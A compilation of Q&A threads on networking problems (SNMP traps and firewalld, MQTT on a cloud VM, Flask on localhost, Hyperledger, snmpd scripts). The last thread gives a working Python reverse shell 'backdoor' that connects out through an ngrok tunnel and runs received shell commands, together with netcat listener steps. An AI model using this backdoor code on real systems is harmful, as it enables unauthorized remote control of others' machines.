pysnmp not able to receive trap from different machine - python-2.7

Instead of localhost IP , I have My VM ip (eth0-192.168.12.20) to receive trap notification, I am not receiving any traps if generate one from outside the VM(I am using snmptrap command from another machine) but I can see SNMP data when I do tcpdump on VM interface eth0.
If I generate trap from same machine using snmptrap command I can see trap data via PySNMP trap receiver script.
Option's tried:
1. Tried binding the port to 0.0.0.0 to receive trap from any machine
2. Enabled debugging option in pysnmp to get some idea to solve the issue. There is no info generated when sending snmptrap from outside machine
The closest scenario similar to my question is present in the following link which does not have final solution.
Code:
SNMP v1 and v2c:
from pysnmp.carrier.asynsock.dispatch import AsynsockDispatcher
from pysnmp.carrier.asynsock.dgram import udp, udp6
from pyasn1.codec.ber import decoder
from pysnmp.proto import api
from pysnmp.entity import engine, config
from pysnmp.entity.rfc3413 import ntfrcv
from pysnmp import debug
debug.setLogger(debug.Debug("all"))
### SNMPv2c/SNMPv1 setup
### Callback function for receiving notifications
def v2cv1CallBackFunc(snmpEngine, stateReference, contextEngineId, contextName,
varBinds, cbCtx):
transportDomain, transportAddress = snmpEngine.msgAndPduDsp.getTransportInfo(stateReference)
print transportDomain, transportAddress
# Get an execution context...
execContext = snmpEngine.observer.getExecutionContext(
'rfc3412.receiveMessage:request'
)
# ... and use inner SNMP engine data to figure out peer address
print('Notification from %s, ContextEngineId "%s", ContextName "%s"'
%('#'.join([str(x) for x in execContext['transportAddress']]),
contextEngineId.prettyPrint(), contextName.prettyPrint()))
for name, val in varBinds:
print('%s = %s' % (name.prettyPrint(), val.prettyPrint()))
# Create SNMP engine with autogenernated engineID and pre-bound
# to socket transport dispatcher
snmpEngine = engine.SnmpEngine()
# SNMPv1/2c setup
# SecurityName <-> CommunityName mapping
config.addV1System(snmpEngine, 'my-area', "public")
# Specify security settings per SecurityName (SNMPv2c -> 1)
config.addTargetParams(snmpEngine, 'my-creds', 'my-area', 'noAuthNoPriv', 1)
# Transport setup
# UDP over IPv4, first listening interface/port
config.addSocketTransport(
snmpEngine,
udp.domainName + (1, ),
udp.UdpSocketTransport().openServerMode(('0.0.0.0', 162))
)
# Register SNMP Application at the SNMP engine
ntfrcv.NotificationReceiver(snmpEngine, v2cv1CallBackFunc)
snmpEngine.transportDispatcher.jobStarted(1) # this job would never finish
# Run I/O dispatcher which would receive queries and send confirmations
try:
snmpEngine.transportDispatcher.runDispatcher()
except:
snmpEngine.transportDispatcher.closeDispatcher()
raise
Thanks in advance

I found the issue with the help from my IT team. Basically the API is working perfectly.
The firewalld application is not allowing the packets to pass through. So after I added the SNMP port to firewall exception list, it made my code working.
Commands I used:
sudo firewall-cmd --add-port=161-162/udp --zone=public --permanent
sudo systemctl restart network
sudo systemctl reload firewalld

Related

How to connect to Mosquitto MQTT Broker, that is running on a Google Cloud Virtual Machine Instance, using mqtt.js

What I am trying to achieve: I have a Mosquitto MQTT Broker running on a Google Cloud virtual machine (Ubuntu), and I want to be able to connect to it from my local PC using mqtt.js
My setup
I have created a VM instance in Google Cloud, running Ubuntu 20.04.LTS.
Some of the settings:
Firewall – allow HTTPS and allow HTTP
Firewall rule – opens port 1883
I installed Mosquitto MQTT Broker (version 1.6.9) on this VM.
I was able to verify the installation and that it was running, by opening to SSH terminals, one to publish, one to subscribe
mosquitto_sub -t test
mosquitto_pub -t test -m “hello”
Then I read that when I want to connect to VMs using third-party tools, I must create and upload my own SSH keys to VMs:
ssh-keygen -t rsa -f C:\keys\VM_KEYFILE -b 2048 pwd: ****
I got two files now, the private and public keys:
VM_KEYFILE
VM_KEYFILE.pub
I then used icacls to modify the private key’s permissions:
icacls.exe VM_KEYFILE /reset
icacls.exe VM_KEYFILE /grant:r “$($env:username):(r)”
icacls.exe VM_KEYFILE /inheritance:r
I then successfully connected ot the VM from a Windows console:
ssh -i "VM_KEYFILE" username#vm_public_ip_address
So now I want to try and connect using node.js
I already have a javascript file that uses mqtt.js to connect to some of the public MQTT brokers, e.g. HiveMQ
Some of its settings are:
let broker_host = 'broker.hivemq.com';
let broker_port = 1883;
let client_id = 'my_client_1';
const connection_options = {
port: broker_port,
host: broker_host,
clientId: client_id,
clean: true,
keepalive: false
};
My question: How would I modify this JavaScript file to connect to the MQTT broker that is running in the Google Cloud VM
There is no username/password/authentication set up for the broker itself, just the VM.
I tried something like this, but I have no idea how to use the SSH key
let broker_host_gcm_vm = 'https://<vm_public_ip_address>
UPDATE
I can connect to the broker from both (a) MQTT Explorer, and (b) MQTTX deskptop app.
All I have to enter for the connection details is:
Host: mqtt://<ip address>
Port: 1883
Then I can publish / subscribe successfully.
I tried changing my JavaScript connection to the following, but I still can't connect from here:
let broker_host_gcm_vm1 = 'mqtt://<ip address>';
I found the problem.
Let's say the host IP address is 11.22.33.44
The host was none of these:
let broker_host = 'http://11.22.33.44';
let broker_host = 'https://11.22.33.44';
let broker_host = 'mqqt://11.22.33.44';
let broker_host = 'mqtts://11.22.33.44';
But was simply this:
let broker_host = '11.22.33.44';
Simple when you know how :)

localhost / 127.0.0.1 took too long to respond - Attempting to run Flask App

I am trying to run a Flask App locally and running into connection to localhost refused issues. My app directory structure looks something like this:
Directory
- index.py
- app.py
auth
-- init.py
Contents of `init.py`
from flask import Flask,redirect
from werkzeug.middleware.dispatcher import DispatcherMiddleware
from werkzeug.serving import run_simple
from index import application as dashApp
#server_auth.route('/dashboard')
#login_required
def dashboard():
return redirect('/dashboard')
app = DispatcherMiddleware(server_auth,
{'/dashboard': dashApp.server})
# Change to port 80 to match the instance for AWS EB Environment
if __name__ == '__main__':
run_simple('0.0.0.0', 80, app, use_reloader=True, use_debugger=True)
I launch the App using gunicorn auth:app command.
[2022-02-11 20:57:24 -0800] [2273] [INFO] Starting gunicorn 20.1.0
[2022-02-11 20:57:24 -0800] [2273] [INFO] Listening at: http://127.0.0.1:8000 (2273)
[2022-02-11 20:57:24 -0800] [2273] [INFO] Using worker: sync
[2022-02-11 20:57:24 -0800] [2274] [INFO] Booting worker with pid: 2274
I have tried a few things to troubleshoot the issue.
netstat -avn | grep 8000
tcp4 0 0 127.0.0.1.8000 *.* LISTEN 131072 131072 2273 0 0x0100 0x00000006
Turned off the firewall, flushed dns cache, clear browser cache as mentioned in this link:
https://www.hostinger.com/tutorials/localhost-refused-to-connect-error
with limited info given, I suggest you can try a few other things:
create a simple / get API(without any decorator) and try to hit it with
breakpoint() in code to check.
Instead of gunicorn , first try to run with a normal server
python init.py
If the other answer by #Vismay doesn't work try changing your port from 80 to 8080. Since you didn't provide minimum info, Port 80 might be in use by other services
Could you try run lsof -i:80 and lsof -i:8000 to determine if they are used.
Maybe your problem is related to "# Change to port 80 to match the instance for AWS EB Environment". Assuming that you're trying to run it locally, consider that in Linux "You need root to run at port 80" (i.e. use sudo to run your server) while in Windows usually ports under 1024 are considered privileged ports and might need a similar solution. How to fix? Try using a different port for your Flask app (say, 5000).
In other case, it seems that Elastic Beanstalk only uses port 80 for inbound traffic (connection with other instances), so maybe you should try to use a different port. For example, in this part of the EB docs they just use port 8000. This seems to be the same conclusion reached in another SO question: Running Flask port 80 on Elastic-Beanstalk Worker
The ELB worker is connected to an SQS queue, by a daemon that listens to that queue, and (internally) posts any messages to http://localhost:80. Apache is listening on port 80. (...) So the solution I found, is to change which port the local daemon posts to - by reconfiguring it via a YAML config-file, it will post to port 5001, where my Flask app was running. This mean Apache can continue to handle the health-checks on port 80, and Flask can handle the SQS messages from the daemon.

docker exec cli peer channel create | failed to create new connection: context deadline exceeded | amazon managed blockchain

I am trying to setup hyperledger fabric blockchain network using amazon managed blockchain following this guide. In the step 6, to create the channel I have executed the following command,
docker exec cli peer channel create -c hrschannel -f /opt/home/hrschannel.pb -o orderer.n-zzzz.managedblockchain.us-east-1.amazonaws.com:30001 --cafile /opt/home/managedblockchain-tls-chain.pem --tls
But I am getting the following error,
Error: failed to create deliver client: orderer client failed to connect to orderer.n-zzzz.managedblockchain.us-east-1.amazonaws.com:30001: failed to create new connection: context deadline exceeded
Help me to fix this issue.
Edited:
I asked the same question in reddit. One user replied that he added listenAddress environment variable in my configtx.yaml file. He did not say clear information about which listenAddress and where to add that address in configtx.yaml. Here is my configtx.yaml file.
################################################################################
#
# Section: Organizations
#
# - This section defines the different organizational identities which will
# be referenced later in the configuration.
#
################################################################################
Organizations:
- &Org1
# DefaultOrg defines the organization which is used in the sampleconfig
# of the fabric.git development environment
Name: m-CUB6HI
# ID to load the MSP definition as
ID: m-B6HI
MSPDir: /opt/home/admin-msp
# AnchorPeers defines the location of peers which can be used
# for cross org gossip communication. Note, this value is only
# encoded in the genesis block in the Application section context
AnchorPeers:
- Host:
Port:
################################################################################
#
# SECTION: Application
#
# - This section defines the values to encode into a config transaction or
# genesis block for application related parameters
#
################################################################################
Application: &ApplicationDefaults
# Organizations is the list of orgs which are defined as participants on
# the application side of the network
Organizations:
################################################################################
#
# Profile
#
# - Different configuration profiles may be encoded here to be specified
# as parameters to the configtxgen tool
#
################################################################################
Profiles:
OneOrgChannel:
Consortium: AWSSystemConsortium
Application:
<<: *ApplicationDefaults
Organizations:
- *Org1
Help me to fix this issue.
One must check if the peer container is able to communicate with the orderer container. curl orderer.endpoint port can be used to check the connection. If the peer is unable to communicate then either the orderer container is down or could be due to different security groups.
Update:
As OP mentioned in the comments, changing the port helped in resolving the issue. One must give it a try.

snmpd pass to run python

Im trying to query a modbus device trough snmp using snmpd to pass a python script to retrieve data.
#! /bin/bash
if [ "$1" = "-g" ]
then
echo .1.3.6.1.4.1.52612.10.3.1
echo string
python /usr/local/bin/readvolt.py
fi
exit 0
And this is the readvolt.py looks like :
#!/usr/bin/python
import minimalmodbus
eqp = minimalmodbus.Instrument('/dev/ttyUSB0',1) # port name, slave address (in decimal)
# skip some other lines for serial port initialization
volt = eqp.read_float(0,4,2) # getting data from serial modbus
print volt
and this line from my snmpd.conf :
pass .1.3.6.1.4.1.52612.10.3.1 /bin/sh /usr/local/bin/volt.sh
my question : I got traceback from python, couldnot find minimalmodbus module, but when i tried to run the readvolt.py from directly from host, it is working as expected (it can print out the result (volt) )
pi#raspberrypi:/usr/local/bin $ readvolt.py
220.25
I also tried using simple python script (test.py) just to make sure if snmpd pass can run python script on respond of snmpget from snmp manager
#!/usr/bin/python
import sys
print "test"
It run OK :
suryo#r50e:~$ snmpwalk -v2c -c public 192.168.1.5 .1.3.6.1.4.1.52612.10.3.1
iso.3.6.1.4.1.52612.10.3.1 = STRING: "test"
suryo#r50e:~$
what is the problem here ? seems that python could not import external module when it is run by snmpd pass.
I'm thinking if this is an access control issue, Debian-snmp doesnt have right to access serial port..
Problem is solved, by finding out the username of the snmpd daemon. I put whoami in the script and got 'Debian-snmp', then becoming straight forward, checking group membership by running :
pi#rraspberrypi:~$ groups Debian-snmp
Debian-snmp : Debian-snmp
Put Debian-snmp in the dialout membership to grant full access to serial ports:
pi#raspberrypi:~ $ sudo usermod -a -G dialout Debian-snmp
Restart the snmpd to logon with new membership, and voilla..It can read the slave modbus device from snmp command /snmpget

reverse shell port forwarding

i create a reverse shell with python and i have a problem with my router in port forwarding.
I don't have any static ip.
In router:
Protocol: TCP
Lochealipaddr: 192.168.1.10
Localport: 8090
Wanipaddr: ---
Wanport: 8090
state: enable
in my python script i cant bind on my wan ip address
ST.bind((Wanipaddr, 8090))
if i binding on localipaddr my reverse shell client can't connect to the server
whats my problem solution??
thanks
if you want to use your backdoor to receive connections outside LAN use ngrok
example:
1- lets listen on port 4444:
nc -lp 4444
2- after ngrok is installed you will run this command:
ngrok tcp 444
3- now find the ngrok address
ngrok address
4- use your ngrok address to the client connect
# backdoor.py
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
HOST = '0.tcp.ngrok.io'
PORT = 12969
s.connect((HOST, PORT))
while True:
conn = s.recv(2048).decode()
if conn[:3] == 'cd ':
os.chdir(conn[3:])
cmd = ''
else:
proc = subprocess.Popen(conn, stdout=subprocess.PIPE,stderr=subprocess.PIPE, stdin=subprocess.DEVNULL, shell=True)
stdout, stderr = proc.communicate()
cmd = stdout+stderr
cmd += str('\n'+os.getcwd()).encode()
s.send(cmd)
5- now you can connect with anyone outside your network
shell
It sounds like your router is configured to forward requests from the internet on port 8090 to your host (assuming you have the correct LAN IP). Perhaps just try binding to 0.0.0.0.
From wikipedia, it fits this context:
A way to specify "any IPv4 address at all". It is used in this way when configuring servers (i.e. when binding listening sockets).
In other words, you're telling your server to essentially listen on every available network interface (on that port).